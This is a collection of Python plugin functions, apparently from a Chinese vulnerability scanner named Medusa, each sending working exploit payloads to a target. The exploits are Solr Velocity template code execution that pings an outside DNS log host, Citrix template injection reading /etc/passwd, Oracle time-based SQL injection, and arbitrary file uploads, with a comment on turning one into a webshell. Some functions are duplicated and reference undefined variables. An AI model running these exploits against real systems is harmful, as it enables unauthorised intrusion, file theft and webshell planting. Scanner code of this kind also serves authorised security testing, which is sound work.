def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url = scheme + "://" + url + ":" + str( port) + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/config" DL = ClassCongregation.Dnslog() payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format( DL.dns_host()) payload_url1 = scheme + "://" + url + ":" + str(port) + payload payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }""" headers1 = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', } resp = requests.post(payload_url1, data=payload_data, headers=headers1, proxies=proxies, timeout=6, verify=False) resp2 = requests.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False) con2 = resp2.text if DL.result(): Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format( url, con2, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/vpn/../vpns/portal/scripts/newbm.pl" payload_url = scheme + "://" + url + ":" + str(port) + payload randoms = rand() try: headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, "Connection": "close", "NSC_USER": "******".format(randoms), "NSC_NONCE": "nsroot" } data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format( randoms) resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=5, verify=False, allow_redirects=False) con = resp.text code = resp.status_code if code == 200 and con.find("parent.window.ns_reload") != -1: payload_url2 = scheme + "://" + url + ":" + str( port) + '/vpn/../vpns/portal/{}.xml'.format(randoms) headers2 = { "NSC_USER": "******", "NSC_NONCE": "nsroot", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0", 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, } resp2 = requests.get(payload_url2, headers=headers2, proxies=proxies, timeout=5, verify=False) con2 = resp2.text code2 = resp2.status_code if code2 == 200 and con2.find("root:") != -1 and con2.find( "bin:") != -1 and con2.find("/root") != -1: Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format( url, payload_url2, data, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名 # if __name__ == '__main__': # # with open(r'../123.txt', 'r') as file: # content_lists = file.readlines() # url = [x.strip() for x in content_lists] # for l in url: # medusa(l) #medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port for turl in urls: try: payload_url = scheme + "://" + url + turl + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 500 and con.lower().find('gqxmicrosoft') != -1: Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类 try: payload_url = scheme + "://" + url + ':' + str( port) + "/include/get_user.aspx" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text if con.lower().find('button_normal') != -1: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = ClassCongregation.randoms().result(20) payload = "/library/editornew/Editor/img_save.asp" payload_url = scheme + "://" + url + ":" + str(port) + payload data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert {} ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''.format(RD) Headers['Content-Type'] = 'application/x-www-form-urlencoded' Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con) if match: payload_url2 = scheme + "://" + url + ":" + str( port) + "/library/editornew/Editor/NewImage/" + match.group(1) resp2 = requests.get(payload_url2, headers=Headers, timeout=6, proxies=proxies, verify=False) con2 = resp2.text code2 = resp2.status_code #如果要上传shell直接把testvul这个值改为一句话就可以 if code2 == 200 and con2.lower().find(RD) != -1: Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port urls = [ '/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1', '/Price/AVL/AVLPriceTrends_SQU.aspx?classId=1', '/Price/SuggestList.aspx?priceid=1', '/PriceDetail/PriceComposition_Formula.aspx?indexNum=3&elementId=1', '/Products/Category/CategoryOption.aspx?option=IsStop&classId=1', '/Products/Tiens/CategoryStockView.aspx?id=1', '/custom/CompanyCGList.aspx?ComId=1', '/SuperMarket/InterestInfoDetail.aspx?ItemId=1', '/Orders/k3orderdetail.aspx?FINTERID=1', '/custom/GroupNewsList.aspx?child=true&groupId=121' ] payload1 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,0)" payload2 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,5)" for payload in urls: try: payload_url = scheme + "://" + url + ":" + str( port) + payload + payload1 payload_url2 = scheme + "://" + url + ":" + str( port) + payload + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() time0 = time.time() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) time1 = time.time() resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) time2 = time.time() con = resp.text code = resp.status_code code2 = resp2.status_code if code2 != 0 and code != 0 and ((time1 - time0) - (time2 - time1)) > 4: Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format( url, con, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload1 = "/base/post.php" payload_url1 = scheme + '://' + url + ':' + str(port) + payload1 dada = "act=appcode" payload2 = "/base/appfile.php" payload_url2 = scheme + '://' + url + ':' + str(port) + payload2 ran = ranstr(10) payload_url3 = scheme + '://' + url + ':' + str(port) + "/effect/source/bg/{}.txt".format(ran) headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', } headers2 = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE', } resp = requests.post(payload_url1, data=dada,proxies=proxies, headers=headers, timeout=5, verify=False) con = resp.text k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值 md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest() dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en) resp2 = requests.post(payload_url2, data=dada2,proxies=proxies, headers=headers2, timeout=5, verify=False) resp3 = requests.get(payload_url3, headers=headers, proxies=proxies,timeout=5, verify=False) code3 = resp3.status_code con3 = resp3.text if code3 == 200 and con3.find(ran) != -1: Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url2,dada2,payload_url3,con3) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: Headers1 = Headers Headers1['Content-Type'] = 'application/x-www-form-urlencoded' payload_url = url + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=Headers1).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/config" DL = ClassCongregation.Dnslog() payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format( DL.dns_host()) payload_url1 = url + payload payload_url2 = url + payload2 payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }""" Headers2 = Headers Headers2['Content-Type'] = 'application/json' resp = requests.post(payload_url1, data=payload_data, headers=Headers2, proxies=proxies, timeout=6, verify=False) resp2 = requests.get(payload_url2, headers=Headers1, timeout=6, proxies=proxies, verify=False) con2 = resp2.text if DL.result(): Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format( url, con2, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类